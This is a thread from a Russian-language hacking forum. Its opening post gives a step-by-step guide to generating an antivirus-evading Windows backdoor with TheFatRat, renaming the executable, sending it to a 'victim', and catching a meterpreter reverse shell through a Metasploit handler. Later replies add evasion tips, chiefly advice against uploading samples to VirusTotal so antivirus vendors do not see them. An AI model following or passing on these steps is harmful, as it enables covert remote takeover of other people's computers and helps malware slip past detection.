Статья The Fat Rat Backdoor. 100% эксплоит (не детектится антивирусами)

Общий Салам!
Хочу Вас познакомить с одним замечательным генератором TheFatRat.

Шаг 1. Устанавливаем git
sudo apt-get install git
Шаг 2. Клонируем исходники генератора
git clone https://github.com/Screetsec/TheFatRat.git
Шаг 3. Переходим в cd TehFatrat/Setup, даем права на выполнение chmod +x setup.sh и наконец запускаем инсталятор ./setup.sh
Шаг 4. После установки всех зависемостей нужно обратно перейти в директорию TheFatrat и дать права на исполнение двум файлам для этого введите:
chmod +x fatrat и chmod +x powerfull.sh

Шаг 5. Запускаем генератор для этого введите ./fatrat
Шаг 6. Выбираем второй пункт в меню ([02] CREATE FUD 100% BACKDOOR ( SLOW BUT POWERFULL)
Шаг 7. Вводим наш ip адрес (адрес машины с которого производим атаку) (в моем случае set lhost: 192.168.1.100)
Шаг 8. Вводим порт прослушивания (в моем случае set lport: 5555)
Теперь ждем пока сгенерируется наш shell code :) (После того как сгенерируется шелл код, окно автоматически закроется)
Идем в директорию TheFatrat/output и видим там Powerfull.exe (этот экзешник можно переименовать как вам вздумается)
Шаг 9. Перед тем как отправить его жертве проверим его на или как видим результаты впечатляют)))
Перед отправкой на VirusTotal прочти здесь !
Шаг 10. Запускаем msfconsole:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.100
set lport 5555
exploit

Шаг 11. Запускаем экзешник на машине жертвы и вуаля meterpreter сессия получена!!!

P.S Прошу строго не судить я тут у вас впервые и заранее извиняюсь за отсутствие картинок и за оформление.
 

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
Мне нравится Ваша статья, когда-то читал про FAT-RAT, а в каких условиях вы тестили?
 
L

Leon

Шаг 9. Перед тем как отправить его жертве проверим его на или как видим результаты впечатляют)))
Непроверяйте на virustotal,Непроверяйте на virustotal,Непроверяйте на virustotal:confused:
 
  • Нравится
Реакции: Alexs565 и Raj_Hack
G

gURaBA_N

Решил опробовать. попробовал на 2 антивиря определили: IKARUS Security: Trojan.AD.Swrort и Norton Antivirus: Heur.AdvML.B

норм:)
 
S

SergaevOleg

Алейкум салам!

Думаю ТС уже понял, что на virustotal.com и иже с ними чекать больше не стоит. ;)

Мне тоже понравилась твоя статья. Продолжай в том же духе.

По существу: на x64 бы починить)
 
P

pahahak

Думаю ТС уже понял, что на virustotal.com и иже с ними чекать больше не стоит. ;)
ТС то может и понял, вот все остальные ламеры не понимают по сей час, я считаю нужно писать в каждой теме для особо одарённых что нельзя проверять на VT и оповещать и доносить до них это. Так как помимо ТС ещё написал повыше другой пользователь с ником gURaBA_N цитирую: "почему?" - это второй после ТС человек не понимающий суть VT, огромное количество ламеров набежавших на форум элементарно не вдупляют таких вещей, а лезут суда взять годноту и слить на VT над такими моментами должна думать администрация я считаю. Уверен на 100% на форуме ещё немалое количество любителей сливать всё на VT и вновь прибывших любителей с каждым днём всё больше. На многих форумах за такое пермоментный бан выписывают, без сю-сюканья. ИБО сколько лет они уже сливают на VT сколько всего!? Это не понятные мне люди, что у них в головах вообще. Им дай приватный софт они его за один день ушатают своими тысячными ламерскими загрузами на VT. Факт есть факт.
 
Последнее редактирование модератором:

mcfly

Green Team
08.09.2016
663
645
BIT
146
ТС то может и понял, вот все остальные ламеры не понимают по сей час, я считаю нужно писать в каждой теме для особо одарённых что нельзя проверять на VT и оповещать и доносить до них это. Так как помимо ТС ещё написал повыше другой пользователь с ником gURaBA_N цитирую: "почему?" - это второй после ТС человек не понимающий суть VT, огромное количество ламеров набежавших на форум элементарно не вдупляют таких вещей, а лезут суда взять годноту и слить на VT над такими моментами должна думать администрация я считаю. Уверен на 100% на форуме ещё немалое количество любителей сливать всё на VT и вновь прибывших любителей с каждым днём всё больше. На многих форумах за такое пермоментный бан выписывают, без сю-сюканья. ИБО сколько лет они уже сливают на VT сколько всего!? Это не понятные мне люди, что у них в головах вообще. Им дай приватный софт они его за один день ушатают своими тысячными ламерскими загрузами на VT. Факт есть факт.

Cделать раздел закрытым > Этичный хакинг и тестирование на проникновение пускать людей кто в теме у кого прокачены скилы.
 
  • Нравится
Реакции: Vander

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 353
BIT
2
ТС то может и понял, вот все остальные ламеры не понимают по сей час, я считаю нужно писать в каждой теме для особо одарённых что нельзя проверять на VT и оповещать и доносить до них это. Так как помимо ТС ещё написал повыше другой пользователь с ником gURaBA_N цитирую: "почему?" - это второй после ТС человек не понимающий суть VT, огромное количество ламеров набежавших на форум элементарно не вдупляют таких вещей, а лезут суда взять годноту и слить на VT над такими моментами должна думать администрация я считаю. Уверен на 100% на форуме ещё немалое количество любителей сливать всё на VT и вновь прибывших любителей с каждым днём всё больше. На многих форумах за такое пермоментный бан выписывают, без сю-сюканья. ИБО сколько лет они уже сливают на VT сколько всего!? Это не понятные мне люди, что у них в головах вообще. Им дай приватный софт они его за один день ушатают своими тысячными ламерскими загрузами на VT. Факт есть факт.
Это никак не предупредить, кто-то намеренно это делает, а кто-то так и не поймет...
 
P

pahahak

Это никак не предупредить, кто-то намеренно это делает, а кто-то так и не поймет...
Те кто намеренно делает это одно, а кто по незнанию это другое. А вообще идея diod_ более оптимальна. Я и пояснил это задача Администрации, её решить можно хоть и не на 100% но хотя бы частично.
 

koldonuuchu

Green Team
04.11.2016
36
46
BIT
0
Алейкум салам!

Думаю ТС уже понял, что на virustotal.com и иже с ними чекать больше не стоит. ;)

Мне тоже понравилась твоя статья. Продолжай в том же духе.

По существу: на x64 бы починить)
У вас не работает на x64?
 

veterok

Green Team
27.09.2016
15
8
BIT
7
еще один сканер, не замеченный в сливе антивирусным компаниям
но базы не всегда актуальны
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!